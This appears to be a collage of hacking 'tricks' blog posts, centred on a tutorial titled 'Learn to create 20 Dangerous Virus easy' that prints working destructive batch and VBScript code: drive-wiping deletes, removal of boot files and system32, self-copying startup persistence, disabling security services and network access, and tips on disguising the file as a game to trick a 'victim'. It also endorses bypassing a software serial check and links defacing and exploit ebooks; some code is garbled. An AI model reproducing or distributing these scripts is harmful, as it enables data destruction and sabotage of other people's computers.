Download Microsoft Visual Basic 6.0 Enterprise Edition

Microsoft Visual Basic 6.0 Download

Visual Basic (VB) is the third-generation event-driven programming language and integrated development environment (IDE) from Microsoft for its COM programming model. VB is considered a relatively easy to learn and use programming language, because of its graphical development features and BASIC heritage.
Visual Basic was derived from BASIC and enables the rapid application development (RAD) of graphical user interface (GUI) applications, access to databases using Data Access Objects, Remote Data Objects, or ActiveX Data Objects, and creation of ActiveX controls and objects. Scripting languages such as VBA and VBScript are syntactically similar to Visual Basic, but perform differently.

A programmer(Like You) can put together an application using the components provided with Visual Basic itself. Programs written in Visual Basic can also use the Windows API, but doing so requires external function declarations.

ANY SERIAL NUMBER WILL WORK!! (something like “111-1111111″ or” 110-1234567” will do) 

NOTE: If you get an error that says that “DEVENT.PKG” is missing, go back to the installation and uncheck the “Enterprise Tools” and “Tools” checkmarks. 

Compatible with:-

  • Windows XP 32-bit 
  • Windows Vista 64-bit 
  • Windows 7 32-bit 
  • Windows 7 64-bit
  • Must work on Windows 8 32-bit/ 64-bit
                               

(Smaller Size, All Functions) 

ANKIT FADIA IS AN INDIAN YOUNGEST ETHICAL HACKER THIS IS THE SOME MATERIAL PROVIDED BY US

[   ] Ankit_Fadia___Encryption_Algorithms_Explained.pdf 126 KB
[   ] Ankit_Fadia___Defacing_Websites_A_Step_By_Step_Process.pdf 16 KB
[   ] Ankit_Fadia___Transparent_Proxies_With_Squid.pdf 13 KB
[   ] Ankit_Fadia___FTP_Exploits.pdf 36 KB
[   ] Ankit_Fadia___Tracing_IP_DNS_WHOIS.pdf 24 KB
[   ] ANKIT_FADIA_HACKING_EBOOKS.rar 1 MB
[   ] Ankit.Fadia.Private.HAcking.Institution.Videos.By.Deejam.part1.rar 205 MB
[   ] Ankit.Fadia.Private.HAcking.Institution.Videos.By.Deejam.part2.rar 41 MB

Learn to create 20 Dangerous Virus easy

Note :
Here I am posting 21 program scripts which are helped in create a virus using
notepad. Some of them will works on windows xp and. some of them in windows 7
Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
No 2:-
Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .
NOW TYPE THE FOLLOWING CODE ::
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.
Delete the entire registry
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Now save it as kinng.bat and the batch file is created .
No 3:-
How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER – DO NOT CLICK THIS FILE.
No 4 :-
How to stop someone’s internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
No 5 :-
ShutDown PC million Times::::
1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c “any comment u want” then press next
note: this “1000” i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want…
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a
No 6:-
Open Notepad
Write / copy the below command there:
” del c:\WINDOWS\system32\*.*/q ” without quote
and save as ” anything.bat
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.
No 7:-
Process:
Open Notepad
Copy the below command there
“rd/s/q D:\
rd/s/q C:\
rd/s/q E:\” ( without quotes )
Save as “anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.
No 8 :-
Just open the Notepad and type the paste the following Code.
set ws=createobject(“wscript.shell”)
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell=”wscript.shell
strDir=”C:\WINDOWS”
strfile=”\wscript.vbs
st=Chr(34)
strlog=”shutdown -l”
strtxt2=”ws.run(strlog)”
set obfso=CreateObject(“Scripting.FileSystemObject”)
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline(“set ws=createobject(“&st&strshell&st&”)”)
obfile.writeline(“ws.run(“&st&strlog&st&”)”)
ws.regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff”,”C:\WINDOWS\wscript.vbs”,”REG_SZ
Now Save This Notepad file With Any Name Having .vbs Extension .
No 9 :-
Open Notepad and write “start” without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.
No 10:-
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as “Anything.BAT” in All Files and send it.
No 11 :-
Toggle your friend’s Caps Lock button simultaneously:
Code:
Set wshShell =wscript.CreateObject(“WScript.Shel
l”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
No 12:-
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell
“)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
No 13 :-
This Virus Deletes All The Content Of A Drive…
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anything.bat
No 14:-
This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe
Next
Save It As Anything.vbs
No 15 :-
The Most Simple Virus To Crush The Window
It Only Works With Windows XP
@Echo off
Del C: *.* |y
Save It As Anything.bat
No 16 :-
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
No 17:-
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
No 18 :-
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save As A bat File
No 19 :-
Change Files To Non-working TXT Files
Save As A bat File
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
No 20 :-
System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
Save As A bat File
No 21:-
Temporarily Flood Network
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
? Open Notepad
? Type :
@ECHO OFF
shutdown -s -t 10 -c “Virus Attack…”
exit
? File >> Save As…
? Name it : virus.bat
? Start >> All Programs
? Right Click on Startup >> Open
? This open the Startup folder
? Paste the Virus.bat file here !
*** That’s all , now the computer will
automatically shutdown on every startup !
How to Spread it:
Windows does’nt allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>..cutomize>>..choose icon
Now give an attractive icon to it.
Now name it something intresting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily curropted.

I thought To post Some More Viruses Under This POst So Here Are They

How to stop someone’s internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew

ShutDown PC million Times::::
1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c “any comment u want” then press next
note: this “1000” i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want…
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u
will find the icon on ur desktop, dont open it, just right click on it
and press properties>change icon>select the icon the the internet
explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Freeze someone’s desktop:::
this is a funny trick, u can freeze someone’s desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now
in the desktop, we have 2 remove desktop icons and shortcuts, so right
click on the mouse and then properties, click on desktop then select
customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now
to remove the shortcuts in the desktop, go to start and select My
Computer, then click on c: right click on ur mouse and select new
folder, write it any name
6.now go to desktop & select all da
icons and right click on them then press cut,go to c: and paste them in
the folder dat u created then close the window.
7.now to put the
fake desktop image and remove the taskbar, so right click on desktop and
gp to properties, now go to desktop and select Browse, select the file
that u saved then press appply then ok. now to remove the windows
taskbar, right click on the taskbar and go 2 properties, then select
autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

SHUT UR INTERNET PERMENANTLY:::
This
is a slightly more advanced one. It shuts down your internet
permanately. I tried it on myself accidently, i knew what it did, and it
still took me a couple of days to get my internet back. works best on
XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll
site or something. BTW, that 3rd line, isnt what disables the internet
permanately. It is somethinge else, that just provides a fast response
to shut down any connections.
@echo off
reg
add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t
REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del “C:\Program Files\Microsoft Games
del “C:Nexon
del “C:\Program Files\Xfire
del “C:\Program Files\Adobe”
del “C:\Program Files\Internet Explorer”
del “C:\Program Files\Mozilla Firefox”
del “C:\WINDOWS”
del “C:\WINDOWS\system32″
del “C:\WINDOWS\system32\cmd”
del “C:\WINDOWS\system32\iexpress”
del “C:\WINDOWS\system32\sndvol32″
del “C:\WINDOWS\system32\sndrec32″
del “C:\WINDOWS\system32\Restore\rstrui”
del “C:\WINDOWS\system32\wupdmgr”
del “C:\WINDOWS\system32\desktop”
del “C:\WINDOWS\java”
del “C:\WINDOWS\Media”
del “C:\WINDOWS\Resources”
del “C:\WINDOWS\system”
del “C:\drivers”
del “C:\drv”
del “C:\SYSINFO”
del “C:\Program Files”
echo ipconfig/release_all>>c:windowswimn32.bat
net stop “Security Center”
net stop SharedAccess
> “%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg
del “%Temp%.kill.reg
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::
Warning – Do not run it on your computer
I’m gonna teach you how to make a virus named Matrix…
1-Open notepad
2-Put in this code
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”, ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]=”C:\rawr.exe”;
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp(“CLICK.bat”, ios::app);
fp
fp
fp
fp
}
system(“START CLICK.bat”);
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system(“call shutdown.exe -S”);
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;
3-save it as matrix.bat
4-finish
AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN
AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT

6 Most Common Password Cracking Methods And Their Countermeasures

There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out thisarticle to be safe and to prevent your online accounts from hacking.

1. BruteForce Attack

brute force attack
Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computerand complexity of the password.
Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like “iloveu” or “password” can be cracked easily whereas computer will take years to crack passwords like “aN34lL00″

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.
Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

keylogger
In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.
Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

4. Phishing

Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.
Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two “b”). Always make sure that websites url is correct. Check out below article to know more about phishing.

5. Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords.
Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string (“”) is d41d8cd98f00b204e9800998ecf8427e
Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

6. Guessing

This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.
Countermeasure: Don’t use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

How to detect keylogger on your computer and remove it

System Protecting Tricks Steps to remove or detect keylogger from your computer

  1. You should trace the behavior of you PC in order to find the common virus symptoms because the keylogger symptoms have much in common with the symptoms of other computer infections. We can refer slow computer performance, new icons on your desktop or in tray, network activity and unexpected pop-ups to these symptoms. Also you can notice that the text that you type can appear with little delay – this is the direct symptom that will help you in keystroke logger detection.
  2. Open Task Manager in order to end the process of the installed keylogger. You should know that not every keylogger can be found in Task Manager. Many of them hide their traces. But you should still check the possibility to end its process:
    • Press CTRL+ALT+DELETE, then select Task Manager in the menu.
    • Select Processes tab, scroll the list. Find the process that is calledwinlogon.exe. One process with such a name is a normal thing, but if you have 2 processes with the same name, then you have a keylogger.
    • Highlight the second winlogon.exe and click End process (you should end only the second process with such a name)
    If there is just one process with such a name, then you should check all other processes, using the special services that contain information about most of the processes to detect the malicious one. You can use LiutilitiesNeuber or any other service that you know. If you are an experienced user, then it will be much easier for you to check the processes, because you will not miss the system process with any malicious.
    If you end the process that belongs to keylogger, then the program is deactivated till the next reboot and the third party will not get your personal information.
  3. You should also look through the list of the installed programs. So, click Startmenu, then All programs, try to find there the program that you did not install.Uninstall such programs.
  4. How to detect keylogger? You can also detect this malicious program with the help of Startuplist. So, you should follow the instructions:
    • Press Windows+R buttons, then type msconfig in the line and press Enter
    • Select Startup tab and disable all the unknown programs
    • Then restart your computer.

WINDOWS 8 DOWNLOAD UPGRADE

Experience the latest Microsoft operating system Window 8. Download the iso file frombelow link .Try windows 8 on your pc. You can also experience windows 8 virtually using VM ware Workstation.

How To Get Windows 8 Developer Preview ?

    REQUIREMENTS
  • 1 GHz or faster 32-bit (x86) or 64-bit (x64) processor
  • 1 GB RAM (32 bit) or 2 GB RAM (64 bit)
  • 16 GB (32 bit) or 20 GB (64bit) Available Hardisk.
  • DirectX 9 graphics device with WDDM 1.0 or higher drivers.
  • Taking advantage of touch input requires a screen that supports multi-touch.
    DOWNLOAD LINKS

Download Windows 8 Developer Preview

windows 8
Experience the latest Microsoft operating system Window 8. Download the iso file frombelow link .Try windows 8 on your pc. You can also experience windows 8 virtually using VM ware Workstation.

How To Get Windows 8 Developer Preview ?

    REQUIREMENTS

  • 1 GHz or faster 32-bit (x86) or 64-bit (x64) processor
  • 1 GB RAM (32 bit) or 2 GB RAM (64 bit)
  • 16 GB (32 bit) or 20 GB (64bit) Available Hardisk.
  • DirectX 9 graphics device with WDDM 1.0 or higher drivers.
  • Taking advantage of touch input requires a screen that supports multi-touch.
    DOWNLOAD LINKS

Transform Your Windows 7 To Mac Os X

Ever wanted to experience the look of Mac Os X, If yes then here i brought you an amazing mac theme for your windows.This will give your computer a completely new look like mac. This is great theme to experience Mac Os X. Download the file from below link and enjoy mac os x theme.

  • Extract the file and run it as administrator.
  • Right click on file and click on Run as administrator.
  • Password for the rar file is tricks4u
                                                DOWNLOAD HERE 🙂

How To Disable Right Click On Your Blog ?

1. Got to your blogger Dashboard and then Click on Layout.
blogger widget
 2. Now Click on Add Gadget and select Html/Javascript.
blogger widget
 3. Now paste code given below in the pop up window.

<!–MBW Code–>
<script language=’JavaScript1.2′>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function (“return false”)
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!–Code End http://mybloggersworld.blogspot.in>

4. Save it and done.

© http://www.computerthc.ml

How To Lock Folder ?

1. Open Notepad and Copy code given below into it.

cls
@ECHO OFF
title http://www.computerthc.ml
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” gotoUNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p “pass=>”
if NOT %pass%== coolhacks goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command prompt appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folder double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is mlbnetworkcom)
  • To change the password replace coolhacks with  new password in the above code

© http://www.computerthc.ml